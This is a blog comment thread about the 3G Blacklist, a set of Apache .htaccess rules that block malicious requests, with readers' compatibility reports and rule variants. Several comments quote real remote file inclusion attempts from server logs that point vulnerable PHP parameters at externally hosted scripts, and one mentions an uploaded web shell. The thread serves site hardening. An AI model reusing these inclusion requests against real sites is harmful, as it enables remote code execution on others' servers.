Perishable Press 3G Blacklist

Louis – #1

This is solid gold :)

I’ve had no issue so far with the whole list past into my root .htaccess. I’ll see if it affects the administration of my blog in the futur.

Really great stuff as usual from you. The list is clean and comprehensive.

The formatting syntax with the little spaces before Redirect directives is a little strange; is it your new favorite syntax ? :d

Louis – #3

I might be biased by the excellent post I recently read on Daringfireball — on “Why Apple won’t buy Adobe“, but it might be true in our case that making the rules generic enough so it won’t break any forum/CMS/whatever plateform, also makes the rules less relevant and powerful.

I think that it may be better to keep focused on one environnement only (i.e. Wordpress), and do a heck of a job there. We could also have different variants of the list, for different plateforms.

Anyway, that is just my opinion, as a Wordpress lover and PerishablePress reader.

About my question on indentation, it was more the fact that you are using one space to indent, instead of the classic tabulation. I wondered what did motivate this choice.

Alissa Miller – #4

This 3G series is great. I’ve been following all the articles and updating my .htaccess in small chunks.

Everything is working magically. I’m glad that you got the update in for the Mint fix. I was going to say something, but you beat me to it.

Don – #5

As always great work man! I had a quick test run with it on WP; no holes!

On joomla (1.013) though a few issues that can be resolved my removing these lines:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

I haven’t fully tested in Joomla though; will do when time permits. I also noticed you reduced the list of user agents. may i ask the benefits of the downsize?

Sat – #9

Well, all of this is now implemented on a WordPress site for our company. Having tested all the features of the site, everything is still working just as great - but now with added security. Thanks Jeff!

On the admin side of things however, it appears that “RedirectMatch 403 config\.php” breaks the “visual” mode when creating/editing posts in WordPress for me. This is no big deal really, but I just wanted to confirm, if this is the case for you too, or if I missed something.

Cheers,

Sat.

Louis – #11

Hi Jeff,

I couldn’t wipe out of my head what John Gruber once said about Wordpress and caching. It’s such a shame caching isn’t a part of Wordpress core.

Therefore, after giving it some time to grow, I decided to give WP-SuperCache a chance. After some tweaking, it seems to be working on my blog.

In the process, I discovered that the following line of your wonderful 3G Blacklist was causing the plugin not to serve the .html or .html.gz files.

RedirectMatch 403 \/\/

I commented it out and the rest of the blacklist seems to be okay.

I hope it helps :)

Louis – #13

Hehe, I make a really bad reader… I even can’t cheerlead :p

By the way, thank you for the link, I was an interesting read. I edited my .htaccess and it’s working fine for me too.

As I had my nose on Apache code, I changed the way I handle gzip content on my server. I used to have a somehow tricky strategy involving 3 .htaccess files et co; now I centralize everything in the root .htaccess — as it should be — and I find the code to be way better.

Here it is:

# SEND GZIPPED CONTENT TO COMPATIBLE BROWSERS
AddEncoding x-gzip .gz
AddType "text/css;charset=utf-8" .css
AddType "text/javascript;charset=utf-8" .js
RewriteCond %{HTTP:Accept-encoding} gzip
#RewriteCond %{HTTP_USER_AGENT} !Safari
RewriteCond %{REQUEST_FILENAME}.gz -f
RewriteRule ^(.*)$ $1.gz [QSA,L]

Louis – #15

(a) Yes, it’s my favorite rule indeed, if you remember :p

(b) Managing Apache behavior should always be done in one configuration file (aka .htacces) only. As you say, it’s way easier.

(c) It is juicy, believe me. I’m using it on my main website for the moment, and boy I wish I had known it before !

It filters the browsers and serve compatible ones the .gz version of static files, and that, all over your website. That means for example, that you can gzip Wordpress admin JS & CSS files, and appreciate a tremendous boost on admin pages loading delays !

With files like prototype.js or jquery.js being used by Wordpress, and weighting around 100kb, being served a 70% lighter .gz alternative is really cool.

Louis – #17

That’s the whole idea. It only applies to file you know won’t change. You compress them manually once, then serve these .gz files to the visitors.

On-the-fly compression has its great advantages, but for static content, it’s a waste of CPU.

I wrote a full post on this on my blog, but I fear Google’s translation won’t be as appealing as my natural writing style.

Once again, langage is a true barrier :/

Tom – #18

Is the 3G Blacklist supposed to replace the 2G Blacklist or can you put them both together?

James – #20

Very nice work!! I put this script in place and have notice a significant reduction in the log files.
How would you modify this script to deny all user agents (while keeping in place an allow all IP with deny on specific IPs)? In other words, I would like to allow IP (with specific IP denials) and disallow all user agents? I’ve got a pesky problem with user agents (legit names) trying to access an exploit which no longer exists on our site. see below..

f2.d.5446.static.theplanet.com - - [06/Aug/2008:01:00:51 +0000] "GET
/portal/components/com_extcalendar/extcalendar.php?
mosConfig_absolute_path=http://www.shakershoppe.com/_files/x.txt??M
HTTP/1.1" 403 259

3G is doing a nice job of issuing 403s but I’m ready to turn off all user agents.

Keep up the GREAT WORK!!!

James – #22

Jeff thanks very much for the quick reply and sorry about the confusion. After spending some time on the apache site, i came to the conclusion that blocking user agents (via deny) would also impact the default of deny for IPs. In otherwords apache seems to only allow one default for the typically allow, then deny

In essence blocking all user agents would essentially block all traffic/visitors. I would like to essentially deny all bots/crawlers but allow users. Is there away to do this (instead of specifying user agents to keep out - like in your PART III: USER AGENTS)?

Thanks,
James

Martin – #24

Hey Jeff,

I fired the 3G blacklist into the .htaccess file in my server’s root and things have gone haywire!

I’ve replaced it with the original file my I’m still getting sitewide Internal Server Errors.

If you have any ideas on what I might’ve done, I’d truly appreciate hearing them,

Cheers,

Martin – #26

Thanks so much for the help mate, I solved the problem by manually deleting .htaccess in two directories (I have wp installed on a subdirectory with index.php in the root) and recreating them with the original data, so sorry for bothering you.

I’m still unsure why the 3G list would cause such havoc, but since the server is running Apache and that my host enables local htaccess directives, I’m going to research into number 3: that “required Apache modules are available to local htaccess files”. I hope to get it sorted soon as I can, I will let you know how it goes.
Thanks again.

TechJammer – #27

Jeff: You have Jakarta Commons blacklisted above, and I have User-Agent entries in my logfile for “Jakarta_Commons-HttpClient/3.1″ and also “Jakarta_Commons-HttpClient/3.1-rc1″.

Can you tell me why they are blacklisted? I tried to search info on the web and didn’t find anything useful.

TechJammer – #29

Thanks for the info Jeff, and also for maintaining such a useful web site! I have used quite a few of your tips and suggestions, and your site has become my primary reference for .htaccess and site security issues!

Denny Smith – #30

Thanks for all of your hard work on this site. I too refer to your site anytime I’m in need of .htaccess info / Wordpress loop hacks. Your loops have been instrumental in many of my projects.

Very impressive work!

Thank You!

Nicole McCreary – #32

I’ve had to change all the redirectmatches to rewrite rules in order for it to work on my host.

eg.)

RewriteCond %{REQUEST_URI} ^\: [OR]
RewriteCond %{REQUEST_URI} ^\; [OR]
RewriteCond %{REQUEST_URI} ^\< [OR]
....
RewriteCond %{REQUEST_URI} ^ref\.outcontrol
RewriteRule .* - [F,L]

I don’t touch rewrite rules very often, I was wondering if I have this correct.

Nicole McCreary – #34

Thanks Jeff, everything works correctly after testing it.

I think the mod_alias problem is an issue with the method my host uses for setting up virtual hosting and not permitting symbolic links to be served, or to even override that option.

Denny – #36

Hey Jeff,

I am using Windows Media Encoder, a Pentium 4 pc as a server with a simple web cam setup in my office. Windows Media Encoder is free. The web cam was 50 bucks and the code is a simple (but not very W3c) emebed Windows Media Player.

Perhaps to date, I am the only person that feeds live video on myspace with the same setup.

Imagine what some people could do if they got their hands on that info! LOL!

Denny Smith – #38

Jeff,

That’s correct. It is live video. I am using several things. One is no-ip to mask my actual ip address as well as a static ip port forwarded through 2 routers in a local network. (That was a pain sort of) but a DNS redirect is propbably the best advise as far as securing the connection. After all, you essentially open a pot on your computer. I had to hack my regisrty a bit to allow more than 2 connections to come in. I am thinking about writing a tutorial on the process that would better explain how I am doing this.

By the way, I emailed you a copy of my wp-admin but it must have tagged it as spam.

wp-admin.php was renamed to fx_wp-admin.php and contained code like this?

' //eval($code);
   } else {
      testdata('save_fail');
   };
'
Any suggestion on removing this type of hack?

Thanks!

Claudio – #39

Thank you, very interesting article. But I’m sorry because I’m on a window server and I use IIS.. by chance, have you ever translated your method for IIS? :-)

Nicole McCreary – #40

Regarding IIS - there is no easy or free way of doing the same thing.

You would either have to build something in ASP/.NET which would look at your request parameters and do all the required tests - or purchase a product like http://www.isapirewrite.com/ and then build all the filters you need yourself.

Claudio – #42

@Jeff : thank you for you kind reply. My provider supports isapirewrite, but maybe I should study a bit to translate your list in my httpd.ini… :-)
have a good blogging!

Peter – #43

Re: # PART IV: IP ADDRESSES

I have found another very effective way to deal with blocking ip’s from scumbags remarkably in the Apache docs.

First you create a hosts.deny file and add the restricted IPs

190.176.128.6 -
190.176.176.15 -
190.176.150.150 -
190.176.138.63 -

Next you add a rule to your vhost config file or server main config.

RewriteEngine on
RewriteMap hosts-deny txt:/path/to/hosts.deny
RewriteCond ${hosts-deny:%{REMOTE_ADDR}|NOT-FOUND} !=NOT-FOUND
RewriteRule ^/.* - [F]

The nice thing about this is you can add IPs and the rule is enforced immediately.

Peter – #45

The same code could be used from a .htaccess file. The problem using .htaccess files is the server has to work looking for more controls up the path unless you use AllowOverride None at the bottom of your file. This will however render any other .htaccess files useless in higher directories.

Denny – #46

By the way Jeff. I found the culprit. Someone uploaded a C99madShell v. 2.0 madnet edition to my server. How could they get that on my server?

Michel – #48

Hi,

Thanks for the Tips.

The RedirectMatch 403 \/\/ do not work on this attack:
http://www.mydomainname.com/request/playing.php/playing.php/common/db.php?commonpath=http://mun-hwa.com/bbs/kombi.txt?”

But RedirectMatch 403 db\.php works and the most importend is to block outgoing traffic on server on port 80 the server can not get this url:
http://mun-hwa.com/bbs/kombi.txt?” :-)
I think the firewall works for the most include php attacks.

Also i use ossec to find attacks!

Thanks for helping! And i hope i found in the future more tips here!
Great job!

Michel

AXZM – #49

I can’t say enough good things about your work. I have had countless websites hacked over the years, some my fault, some the hosting provider, some the middleware I was using but in all cases if I had taken the right precautions in my .htaccess, I would have saved myself a lot of time and trouble. Thanks again…

Tony – #51

I just added the 3G Blacklist to my .htaccess, thanks for the wonderful tips you’re sharing. I’ve been implementing your various tips the last few days, and the coldform too, that I’m starting to feel a little guilty, hehe.

I guess the “RedirectMatch 403 \/\/” isn’t conflicting with WP Super Cache anymore. Everything is working great on my blog.

Thanks!

PS: I wanted to be sure there are no problems with the list before submitting the comment, and found out that validator.w3.org can’t access my page, and neither can whatsmyip.org/mod_gzip_test/ (was using it to check if Super Cache is working). I guess these services just append our URL to the end of theirs, and the result is a double forward slash // , which conflicts, again, with this line:

RedirectMatch 403 \/\/

I guess you knew about this… Anyway we can comment it out when we use these services.
I don’t know what the line means, but I guess it’s not that important since you’re not using it. The validator could access perishablepress.com, and found one error. I’ll report you to the code police now!

I’m joking, don’t worry. I won’t tell them.

Fred – #53

Hi, I followed a link to this article and have been reading up on the 3G Blacklist. I copied the file and paste it first in my configuration but the server won’t load so I tried it in the .htaccess and get Forbidden: Access Permission Denied.

I then start removing lines.
RedirectMatch 403 \
Only when I remove these two line the site loads but still will not work from my configuration file.

I’m new to all of this. Any suggesstions and is it OK to leave these out?

Thanks

Fred

Fred – #55

Jeff, thanks for the response and I’m pleased for the comments. I have couple of sites running off the same server and these bots really over load my server with the frequency at which they load pages. Because I have access to root, I’m able to httpd.reload and free resources up. For the next few days I will closely monitor to see the results.

Again, Many Thanks

Fred

Tony – #56

Sorry for the delay, it’s been a very busy week!

I found out that even though I could access my blog and everything is working fine, the validators couldn’t access it because of “RedirectMatch 403 \/\/” when WP Super Cache is enabled. If any one of them is disabled, then everything works fine.

Thanks again Jeff for this great list!

Sebastian – #57

Thanks for your work.

For Joomla 1.0.15 I needed to disable:
# RedirectMatch 403 \/\/
# RedirectMatch 403 \/includes\/

First rule is very site specific as tinyMCE inserted images with a double //
Second rule had prevented loading of some of the js scripts needed for administration. (eg. Save / Close links not working).

Otto – #59

Jeff, thanks for sharing the 3G list. One thing I noticed is that the character strings group blocked some of my pages. The 3G lines in question were:

# RedirectMatch 403 news\.php
# RedirectMatch 403 contact\.php

I am probably not the only one who named the pages on a more “traditional way”, such as contact.php. Any reason why these pages should be blocked?
Otto

Mike – #61

Thanks for the list. I am running a 1.5.8 Joomla! site (and am not technical - but have read up all I can about security. I installed in its entirety and it stops me accessing admin, but I just temp remove the # RedirectMatch 403 \/\/ using sftp then reset when I am finished.
1) Is it possible to exclude a certain directory &/or file but pick up others?
2) Why does the # RedirectMatch 403 \/includes\/ command appear to have no impact in FF3 but causes an error message to appear in IE7 which states “Overlib 4.10…..” This occurs when the events calendar is opened, and mouseovered. I think I have traced the code and the reason it should error is because of a call to an overlib JavaScript which is in a directory “public_html/includes/js/. The routine is by no means essential, but it bugs me not understanding why.
Does this mean that FF3 handles this in a different way or is it that maybe the command is in fact being ignored in FF3?

FYI I added another robot “Twiceler” (something to do with a Uni in USA) that was hammering my site to your blacklist. I do believe it is malicious but heavy on resources. It stopped it in its tracks.
I am looking forward to your next blacklist.
Thanks again.
Regards,
Mike

Mike – #63

Jeff,
Thx for the quick response, I will see what I can make of the suggested directives, at 1st glance they appear double Dutch.

Just to clarify about Twiceler, I meant to state I did NOT think it was malicious, but was hammering my site. I found a ref to it at the following http://www.tngforum.us/lofiversion/index.php?t2746.html

Regards,
Mike

sleepy22 – #64

Hello,

I have a private site, I don’t want any bots clogging up my log files. I want to block all of the following get srings:

"GET /robots.txt
"GET / HTTP/
"GET /images
"GET /favicon.ico

Can anyone help me with the exact code I need for the htaccess file to deny the above commands?

I only want to allow real users who type an exact url address or enter by following a specific URL link to my site.

Thanks
Sleepy22

Alex – #65

Hi and thanks for all your hard work.

I’ve just popped the 3g Blacklist into my .htaccess file, and everything seems OK.

However, the Featurific plugin no longer does it’s thing http://featurific.com/ffw

Any idea what’s up?

Cheers,

Alex

And you have some lovely juicy stuff here!

Tony – #67

Hi Jeff, and all!

I had some troubles with Google after using the 3G Blacklist. I wasn’t sure it’s because of it, so I didn’t write here. But I guess it’s something worth investigating. Google deindexed my little blog, every single article about 2 months ago, and all I could find about it in Google Webmaster tools was that there was a 4xx (yes, just 4xx, nothing specific!) error when googlebot tried accessing the blog. I have another blog on the same server that wasn’t affected, and that blog didn’t have the 3G Blacklist in the .htaccess.

After deleting the 3G entries, googlebot accessed my site, and slowly started reindexing all of the articles.

I wasn’t archiving my monthly logs then (now I do), so I can’t know what really happened! But that unhelpful “4xx error” from Google really drove me crazy!!!

Jeff, please let me know if there’s any way I can find out anything about this problem. For the 4G Blacklist’s sake! I’ll setup a new blog and use the 3G on it if needed.

Alex – #68

Thanks for looking into this Jeff, and for the quick response.

I look forward to hearing your thoughts.

While you are on - do you think munging the name section of the comments code will kill off spam bots?

<input type="text" name="email" id="email" value="" size="22" tabindex="2" />
Mail (will not be published)

And yes, I am not the worlds greatest coder!

Cheers and thanks,

Alex

Tony – #70

Jeff, that was in December, and all of the articles disappeared then, but are back in Google’s index now. I didn’t want to say anything because I wasn’t sure, and nobody here had any problems. I should have emailed you I guess. Here are a couple of links:

http://www.bikeshake.com/pv-glider-mini-glider-balance-bike-review/
http://www.bikeshake.com/giro-hex-mountain-bike-helmet-review/

Maybe some plugin interfered, or maybe wasn’t compatible with the 3G. FYI, I used Super Cache then, which is temporarily deactivated now.

I hope you find the culprit. I really am waiting for the 4G Blacklist, and really want to taste it! :-)

Thanks in advance!

Tony – #72

Jeff,

The thing is, I had read all of the comments here, and Alissa’s post, before I pasted the 3G in my htaccess. And I also commented here a few months back about Super Cache not conflicting. Apparently only googlebot had problems accessing my site. Who knows, maybe it was drunk for a few days then? :-D

jidanni – #75

Surely not every backslash here and in building-the-3g-blacklist-part-1 etc. are needed.

I sense you have gone hog wild on the backslashes, for fear of the unknown.

jidanni – #77

I spent ten whole minutes in emacs,
(rgrep “backslash” “*” “/usr/share/doc/apache2-doc/manual/en/”)
(rgrep “escape” “*” “/usr/share/doc/apache2-doc/manual/en/”)
(w3m-goto-url “http://www.google.com/search?q=apache+backslash+escape” nil nil)
but couldn’t dig up the exact list. So… \y\o\u \w\i\n\\.

jidanni – #79

OK, added Bug 46782 - list of what characters need to be escaped is hard to find
https://issues.apache.org/bugzilla/show_bug.cgi?id=46782

jidanni – #81

Well, as you can see on the bug, they chucked it in the garbage.

jidanni – #83

OK, we find
Apache uses Perl Compatible Regular Expressions provided by the PCRE library.
which
$ man perlre
perlre - Perl regular expressions
should tell the deal.